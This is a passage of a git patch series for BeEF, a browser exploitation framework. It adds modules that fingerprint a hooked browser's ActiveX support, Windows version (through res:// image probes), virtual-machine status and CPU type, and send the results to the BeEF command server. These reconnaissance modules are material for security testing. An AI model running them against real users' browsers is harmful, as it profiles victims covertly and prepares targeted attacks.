+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var result = (beef.browser.hasActiveX())? "Yes" : "No";
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "activex="+result);
+
+});
+
diff --git a/modules/browser/detect_activex/config.yaml b/modules/browser/detect_activex/config.yaml
new file mode 100644
index 000000000..cacbda562
--- /dev/null
+++ b/modules/browser/detect_activex/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_activex:
+            enable: true
+            category: "Browser"
+            name: "Detect ActiveX"
+            description: "This module will check if the browser has ActiveX support."
+            authors: ["bcoles"]
+            target:
+                user_notify: ["IE"]
+                not_working: ["All"]
diff --git a/modules/browser/detect_activex/module.rb b/modules/browser/detect_activex/module.rb
new file mode 100644
index 000000000..29ffcf708
--- /dev/null
+++ b/modules/browser/detect_activex/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_activex < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['activex'] = @datastore['activex']
+		save content
+	end
+
+end

From 065276932c0048a4e1098f8718f5f95b81323064 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 1 Feb 2013 02:51:45 +1030
Subject: [PATCH 174/397] Add os_fingerprinting module

---
 modules/host/os_fingerprinting/command.js  | 44 ++++++++++++++++++++++
 modules/host/os_fingerprinting/config.yaml | 16 ++++++++
 modules/host/os_fingerprinting/module.rb   | 20 ++++++++++
 3 files changed, 80 insertions(+)
 create mode 100644 modules/host/os_fingerprinting/command.js
 create mode 100644 modules/host/os_fingerprinting/config.yaml
 create mode 100644 modules/host/os_fingerprinting/module.rb

diff --git a/modules/host/os_fingerprinting/command.js b/modules/host/os_fingerprinting/command.js
new file mode 100644
index 000000000..2c56114f9
--- /dev/null
+++ b/modules/host/os_fingerprinting/command.js
@@ -0,0 +1,44 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var os_version = new Array;
+	var dom = document.createElement('b');
+
+	Array.prototype.unique = function() {
+		var o = {}, i, l = this.length, r = [];
+		for(i=0; i<l;i+=1) o[this[i]] = this[i];
+		for(i in o) r.push(o[i]);
+		return r;
+	};
+
+	parse_os_details = function() {
+		if (!os_version.length) os_version[0] = "unknown";
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "windows_nt_version="+os_version.unique());
+	};
+
+	// OS fingerprints // in the form of: "URI","NT version(s)"
+	var fingerprints = new Array(
+		new Array("5.1+","res://IpsmSnap.dll/wlcm.bmp"),
+		new Array("5.1+","res://wmploc.dll/257/album_0.png"),
+		new Array("5.1-6.0","res://wmploc.dll/23/images\amg-logo.gif"),
+		new Array("5.1-6.1","res://wmploc.dll/wmcomlogo.jpg"),
+		new Array("6.0+","res://wdc.dll/error.gif")
+	);
+
+	for (var i=0; i<fingerprints.length; i++) {
+		var img    = new Image;
+		img.name   = fingerprints[i][0];
+		img.src    = fingerprints[i][1];
+		img.onload = function() { os_version.push(this.name); dom.removeChild(this); }
+		dom.appendChild(img);
+	}
+
+	setTimeout('parse_os_details();', 2000);
+
+});
+
diff --git a/modules/host/os_fingerprinting/config.yaml b/modules/host/os_fingerprinting/config.yaml
new file mode 100644
index 000000000..8282f1b2e
--- /dev/null
+++ b/modules/host/os_fingerprinting/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        os_fingerprinting:
+            enable: true
+            category: "Host"
+            name: "Fingerprint Operating System"
+            description: "This module attempts to fingerprint the Windows Operating System version using the 'res' protocol handler for Internet Explorer. It loads images from DLLs specific to different versions of Windows. This method does not rely on JavaScript objects which may have been modified by the user or browser compatibility mode."
+            authors: ["bcoles"]
+            target:
+                working: IE
+                not_working: ALL
diff --git a/modules/host/os_fingerprinting/module.rb b/modules/host/os_fingerprinting/module.rb
new file mode 100644
index 000000000..5946f4e7c
--- /dev/null
+++ b/modules/host/os_fingerprinting/module.rb
@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# Uses methods described here:
+# http://www.itsecuritysolutions.org/2010-03-29_fingerprinting_browsers_using_protocol_handlers/
+
+class Os_fingerprinting < BeEF::Core::Command
+
+  def post_execute
+    content = {}
+    content['windows_nt_version'] = @datastore['windows_nt_version'] if not @datastore['windows_nt_version'].nil?
+    if content.empty?
+      content['fail'] = 'Failed to fingerprint Windows version.'
+    end
+    save content
+  end
+
+end

From 30171693ffcae868c71939be75a5a83f1038cb15 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 1 Feb 2013 04:29:06 +1030
Subject: [PATCH 175/397] Add 'beef.hardware.isVirtualMachine()'

Rename 'beef.hardware.getMobileName()' to 'beef.hardware.getName()'
---
 core/main/client/browser.js  |  2 +-
 core/main/client/hardware.js | 13 ++++++++++---
 2 files changed, 11 insertions(+), 4 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index c82ca82d5..7ffefd134 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -965,7 +965,7 @@ beef.browser = {
 		var browser_plugins = beef.browser.getPlugins();
 		var date_stamp = new Date().toString();
 		var os_name = beef.os.getName();
-		var hw_name = beef.hardware.getMobileName();
+		var hw_name = beef.hardware.getName();
 		var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
 		var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;});
 		var screen_size = beef.browser.getScreenSize();
diff --git a/core/main/client/hardware.js b/core/main/client/hardware.js
index 32732e5ec..dc9ae7a4c 100644
--- a/core/main/client/hardware.js
+++ b/core/main/client/hardware.js
@@ -8,6 +8,12 @@ beef.hardware = {
 
 	ua: navigator.userAgent,
 
+	isVirtualMachine: function() {
+		var result = false;
+		if (screen.width % 2 || screen.height % 2) result = true;
+		return result;
+	},
+
 	isNokia: function() {
 		return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
 	},
@@ -36,13 +42,13 @@ beef.hardware = {
          * Returns true if the browser is on a Mobile Phone
          * @return: {Boolean} true or false
          *
-         * @example: if(beef.browser.isMobilePhone()) { ... }
+         * @example: if(beef.hardware.isMobilePhone()) { ... }
          **/
         isMobilePhone: function() {
             return DetectMobileQuick();
         },
 
-	getMobileName: function() {
+	getName: function() {
                 var ua = navigator.userAgent.toLowerCase();
                 if(DetectIphone())              { return "iPhone"};
                 if(DetectIpod())                { return "iPod Touch"};
@@ -78,11 +84,12 @@ beef.hardware = {
                 if(DetectSonyMylo())            { return "Sony Mylo"};
                 if(DetectAmazonSilk())          { return "Kindle Fire"};
                 if(DetectKindle())              { return "Kindle"};
-                if(DetectSonyPlaystation())                 { return "Playstation" };
+                if(DetectSonyPlaystation())                 { return "Playstation"};
                 if(ua.search(deviceNintendoDs) > -1)        { return "Nintendo DS"};
                 if(ua.search(deviceWii) > -1)               { return "Nintendo Wii"};
                 if(ua.search(deviceNintendo) > -1)          { return "Nintendo"};
                 if(DetectXbox())                            { return "Xbox"};
+                if(this.isVirtualMachine())                 { return "Virtual Machine"};
 
 		return 'Unknown';
 	}

From e3dced8a9e7f05b68acc014e7cffbf750fc05f15 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 1 Feb 2013 04:30:25 +1030
Subject: [PATCH 176/397] Add virtual machine icon

---
 core/main/constants/hardware.rb               |   1 +
 extensions/admin_ui/media/images/icons/vm.png | Bin 0 -> 3325 bytes
 2 files changed, 1 insertion(+)
 create mode 100644 extensions/admin_ui/media/images/icons/vm.png

diff --git a/core/main/constants/hardware.rb b/core/main/constants/hardware.rb
index f569378ee..a74f9db96 100644
--- a/core/main/constants/hardware.rb
+++ b/core/main/constants/hardware.rb
@@ -12,6 +12,7 @@ module Constants
   module Hardware
 
     HW_UNKNOWN_IMG        = 'pc.png'
+	HW_VM_IMG             = 'vm.png'
 	HW_IPHONE_UA_STR      = 'iPhone'
  	HW_IPHONE_IMG         = 'iphone.jpg'
 	HW_IPAD_UA_STR	      = 'iPad'
diff --git a/extensions/admin_ui/media/images/icons/vm.png b/extensions/admin_ui/media/images/icons/vm.png
new file mode 100644
index 0000000000000000000000000000000000000000..4f6fac65d2839d4db8f8bc9b4bd12c07837e3298
GIT binary patch
literal 3325
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

literal 0
HcmV?d00001


From c88a2bb8e33387e69f9474455585de58959b9fa0 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 1 Feb 2013 04:32:16 +1030
Subject: [PATCH 177/397] Update 'Detect Virtual Machine' module

---
 modules/host/detect_vm/command.js | 46 ++++++++++++++++++-------------
 1 file changed, 27 insertions(+), 19 deletions(-)

diff --git a/modules/host/detect_vm/command.js b/modules/host/detect_vm/command.js
index 46cf44587..04b2d7b34 100644
--- a/modules/host/detect_vm/command.js
+++ b/modules/host/detect_vm/command.js
@@ -12,25 +12,29 @@ beef.execute(function() {
 
 	var result;
 	var dimensions = {
-	'320, 200' : '',
-	'320, 240' : '',
-	'640, 480' : '',
-	'800, 480' : '',
-	'768, 576' : '',
-	'854, 480' : '',
-	'1024, 600' : '',
-	'1152, 768' : '',
-	'800, 600' : '',
-	'1024, 768' : '',
-	'1280, 854' : '',
-	'1280, 960' : '',
+	'320, 200'   : '',
+	'320, 240'   : '',
+	'320, 480'   : '', // iPhone 4S and earlier
+	'480, 320'   : '', // iPhone 4S and earlier
+	'640, 480'   : '',
+	'640, 1136'  : '', // iPhone 5
+	'800, 480'   : '',
+	'768, 576'   : '',
+	'854, 480'   : '',
+	'1024, 600'  : '',
+	'1136, 640'  : '', // iPhone 5
+	'1152, 768'  : '',
+	'800, 600'   : '',
+	'1024, 768'  : '',
+	'1280, 854'  : '',
+	'1280, 960'  : '',
 	'1280, 1024' : '',
-	'1280, 720' : '',
-	'1280, 768' : '',
-	'1366, 768' : '',
-	'1280, 800' : '',
-	'1440, 900' : '',
-	'1440, 960' : '',
+	'1280, 720'  : '',
+	'1280, 768'  : '',
+	'1366, 768'  : '',
+	'1280, 800'  : '',
+	'1440, 900'  : '',
+	'1440, 960'  : '',
 	'1400, 1050' : '',
 	'1600, 1200' : '',
 	'2048, 1536' : '',
@@ -46,11 +50,15 @@ beef.execute(function() {
 
 	if (dimensions[wh] != undefined) {
 		result = "Not virtualized";
+	} else if (beef.hardware.isVirtualMachine()) {
+		result = "Virtualized";
+	} else if (beef.hardware.isMobilePhone()) {
+		result = "Not virtualized";
 	} else {
 		result = "This host is virtualized or uses an unrecognized screen resolution";
 	}
 
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+result);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+result+"&w="+screen.width+"&h="+screen.height);
 
 });
 

From 0df85344f07bcbf55332c3ad4d318579f09a2d64 Mon Sep 17 00:00:00 2001
From: Wade Alcorn <wade@bindshell.net>
Date: Fri, 1 Feb 2013 07:11:53 +1000
Subject: [PATCH 178/397] Changed ActiveX detection slightly

---
 core/main/client/browser.js | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 7ffefd134..f8741ad3b 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -1014,7 +1014,7 @@ beef.browser = {
 	 * Returns boolean value depending on whether the browser support ActiveX
 	 */
 	hasActiveX: function() {
-		return (typeof(window.ActiveXObject) != "undefined");
+		return !!window.ActiveXObject;
 	},
 
 	/**

From 6913e97e2e3274c8f59d5d690a71912182dda34b Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 3 Feb 2013 03:01:18 +1030
Subject: [PATCH 179/397] Update Windows OS detection

Add functions:
  beef.os.isWinCE()
  beef.os.isWin2000SP1()
  beef.os.isWindows()
---
 core/main/client/os.js | 42 ++++++++++++++++++++++++++++--------------
 1 file changed, 28 insertions(+), 14 deletions(-)

diff --git a/core/main/client/os.js b/core/main/client/os.js
index a9361f962..8a84fa61b 100644
--- a/core/main/client/os.js
+++ b/core/main/client/os.js
@@ -7,9 +7,9 @@
 beef.os = {
 
 	ua: navigator.userAgent,
-	
+
 	isWin311: function() {
-		return (this.ua.indexOf("Win16") != -1) ? true : false;
+		return (this.ua.match('(Win16')) ? true : false;
 	},
 	
 	isWinNT4: function() {
@@ -19,18 +19,25 @@ beef.os = {
 	isWin95: function() {
 		return (this.ua.match('(Windows 95)|(Win95)|(Windows_95)')) ? true : false;
 	},
+	isWinCE: function() {
+		return (this.ua.match('(Windows CE)')) ? true : false;
+	},
 	
 	isWin98: function() {
 		return (this.ua.match('(Windows 98)|(Win98)')) ? true : false;
 	},
 	
 	isWinME: function() {
-		return (this.ua.indexOf('Windows ME') != -1) ? true : false;
+		return (this.ua.match('(Windows ME)|(Win 9x 4.90')) ? true : false;
 	},
 	
 	isWin2000: function() {
 		return (this.ua.match('(Windows NT 5.0)|(Windows 2000)')) ? true : false;
 	},
+
+	isWin2000SP1: function() {
+		return (this.ua.match('Windows NT 5.01 ')) ? true : false;
+	},
 	
 	isWinXP: function() {
 		return (this.ua.match('(Windows NT 5.1)|(Windows XP)')) ? true : false;
@@ -47,6 +54,7 @@ beef.os = {
 	isWin7: function() {
 		return (this.ua.match('(Windows NT 6.1)|(Windows NT 7.0)')) ? true : false;
 	},
+
 	isWin8: function() {
 		return (this.ua.match('(Windows NT 6.2)')) ? true : false;
 	},
@@ -106,20 +114,26 @@ beef.os = {
 	isBeOS: function() {
 		return (this.ua.match('BeOS')) ? true : false;
 	},
+
+	isWindows: function() {
+		return this.isWin311() || this.isWinNT4() || this.isWinCE() || this.isWin95() || this.isWin98() || this.isWinME() || this.isWin2000() || this.isWin2000SP1() || this.isWinXP() || this.isWinServer2003() || this.isWinVista() || this.isWin7() || this.isWin8() || this.isWinPhone();
+	},
 	
 	getName: function() {
-		//windows
-		if(this.isWin311()) return 'Windows 3.11';
-		if(this.isWinNT4()) return 'Windows NT 4';
-		if(this.isWin95()) return 'Windows 95';
-		if(this.isWin98()) return 'Windows 98';
-		if(this.isWinME()) return 'Windows Millenium';
-		if(this.isWin2000()) return 'Windows 2000';
-		if(this.isWinXP()) return 'Windows XP';
+		//Windows
+		if(this.isWin311())        return 'Windows 3.11';
+		if(this.isWinNT4())        return 'Windows NT 4';
+		if(this.isWinCE())         return 'Windows CE';
+		if(this.isWin95())         return 'Windows 95';
+		if(this.isWin98())         return 'Windows 98';
+		if(this.isWinME())         return 'Windows Millenium';
+		if(this.isWin2000())       return 'Windows 2000';
+		if(this.isWin2000SP1())    return 'Windows 2000 SP1';
+		if(this.isWinXP())         return 'Windows XP';
 		if(this.isWinServer2003()) return 'Windows Server 2003';
-		if(this.isWinVista()) return 'Windows Vista';
-		if(this.isWin7()) return 'Windows 7';
-		if(this.isWin8()) return 'Windows 8';
+		if(this.isWinVista())      return 'Windows Vista';
+		if(this.isWin7())          return 'Windows 7';
+		if(this.isWin8())          return 'Windows 8';
 
 		//Nokia
 		if(this.isNokia()) {

From 78162e6d2692c1c68751b699d7edec5a1b9b53d4 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 3 Feb 2013 03:01:54 +1030
Subject: [PATCH 180/397] Add 'beef.hardware.cpuType()'

---
 core/main/client/hardware.js | 23 ++++++++++++++++++++---
 1 file changed, 20 insertions(+), 3 deletions(-)

diff --git a/core/main/client/hardware.js b/core/main/client/hardware.js
index dc9ae7a4c..b5bfa1d4c 100644
--- a/core/main/client/hardware.js
+++ b/core/main/client/hardware.js
@@ -8,10 +8,27 @@ beef.hardware = {
 
 	ua: navigator.userAgent,
 
+	cpuType: function() {
+		// IE
+		if ((typeof navigator.cpuClass != 'undefined')) {
+			cpu = navigator.cpuClass;
+			if (cpu == "x86")   return "32-bit";
+			if (cpu == "68K")   return "Motorola 68K":
+			if (cpu == "PPC")   return "Motorola PPC";
+			if (cpu == "Alpha") return "Digital";
+			if (this.ua.match('Win64; IA64') return "64-bit (Intel)";
+			if (this.ua.match('Win64; x64')  return "64-bit (AMD)";
+		// Firefox
+        } else if ((typeof navigator.oscpu != 'undefined' {
+			if (navigator.oscpu.match('WOW64|x64|x86_64)') return "64-bit";
+		}
+		if (navigator.platform.toLowerCase() == "win64") return "64-bit"
+		return "32-bit";
+	},
+
 	isVirtualMachine: function() {
-		var result = false;
-		if (screen.width % 2 || screen.height % 2) result = true;
-		return result;
+		if (screen.width % 2 || screen.height % 2) return true;
+		return false;
 	},
 
 	isNokia: function() {

From 7dc188242746adc3e982aa9d3692da6a9c4d1f71 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 3 Feb 2013 03:02:27 +1030
Subject: [PATCH 181/397] Add virtual machine icon to browser
 'BeEF::Core::Models::BrowserDetails::hw_icon()'

---
 core/main/models/browserdetails.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/core/main/models/browserdetails.rb b/core/main/models/browserdetails.rb
index 9e72844ed..7ec413eb7 100644
--- a/core/main/models/browserdetails.rb
+++ b/core/main/models/browserdetails.rb
@@ -103,7 +103,8 @@ module Models
     def self.hw_icon(session_id)
 
       ua_string = get(session_id, 'BrowserReportedName')
-
+      hardware  = get(session_id, 'Hardware')
+      return BeEF::Core::Constants::Hardware::HW_VM_IMG if hardware =~ /Virtual Machine/
       return BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG if ua_string.nil?
 
       return BeEF::Core::Constants::Hardware::HW_WINPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_WINPHONE_UA_STR

From 10bdcce34ae70306f7f3b1fcd0890e3f6d8ad6f3 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 3 Feb 2013 03:36:41 +1030
Subject: [PATCH 182/397] Fix typos in 'beef.hardware.cpuType()' and OS
 detection

---
 core/main/client/hardware.js | 14 +++++++-------
 core/main/client/os.js       |  4 ++--
 2 files changed, 9 insertions(+), 9 deletions(-)

diff --git a/core/main/client/hardware.js b/core/main/client/hardware.js
index b5bfa1d4c..50ff77d41 100644
--- a/core/main/client/hardware.js
+++ b/core/main/client/hardware.js
@@ -10,19 +10,19 @@ beef.hardware = {
 
 	cpuType: function() {
 		// IE
-		if ((typeof navigator.cpuClass != 'undefined')) {
+		if (typeof navigator.cpuClass != 'undefined') {
 			cpu = navigator.cpuClass;
 			if (cpu == "x86")   return "32-bit";
-			if (cpu == "68K")   return "Motorola 68K":
+			if (cpu == "68K")   return "Motorola 68K";
 			if (cpu == "PPC")   return "Motorola PPC";
 			if (cpu == "Alpha") return "Digital";
-			if (this.ua.match('Win64; IA64') return "64-bit (Intel)";
-			if (this.ua.match('Win64; x64')  return "64-bit (AMD)";
+			if (this.ua.match('Win64; IA64')) return "64-bit (Intel)";
+			if (this.ua.match('Win64; x64'))  return "64-bit (AMD)";
 		// Firefox
-        } else if ((typeof navigator.oscpu != 'undefined' {
-			if (navigator.oscpu.match('WOW64|x64|x86_64)') return "64-bit";
+        } else if (typeof navigator.oscpu != 'undefined') {
+			if (navigator.oscpu.match('(WOW64|x64|x86_64)')) return "64-bit";
 		}
-		if (navigator.platform.toLowerCase() == "win64") return "64-bit"
+		if (navigator.platform.toLowerCase() == "win64") return "64-bit";
 		return "32-bit";
 	},
 
diff --git a/core/main/client/os.js b/core/main/client/os.js
index 8a84fa61b..0f375ce30 100644
--- a/core/main/client/os.js
+++ b/core/main/client/os.js
@@ -9,7 +9,7 @@ beef.os = {
 	ua: navigator.userAgent,
 
 	isWin311: function() {
-		return (this.ua.match('(Win16')) ? true : false;
+		return (this.ua.match('(Win16)')) ? true : false;
 	},
 	
 	isWinNT4: function() {
@@ -28,7 +28,7 @@ beef.os = {
 	},
 	
 	isWinME: function() {
-		return (this.ua.match('(Windows ME)|(Win 9x 4.90')) ? true : false;
+		return (this.ua.match('(Windows ME)|(Win 9x 4.90)')) ? true : false;
 	},
 	
 	isWin2000: function() {

From 15a502bce6bd88287f68c816299a5919181f87e8 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 3 Feb 2013 03:39:30 +1030
Subject: [PATCH 183/397] Add CPU type to browser initialization

Add support for Firefox 19
---
 core/main/client/browser.js                   | 22 ++++++++++++++-----
 core/main/handlers/browserdetails.rb          |  8 +++++++
 .../admin_ui/controllers/modules/modules.rb   | 15 +++++++++++++
 extensions/console/lib/shellinterface.rb      | 15 +++++++++++++
 4 files changed, 55 insertions(+), 5 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index f8741ad3b..34701d3ab 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -220,12 +220,20 @@ beef.browser = {
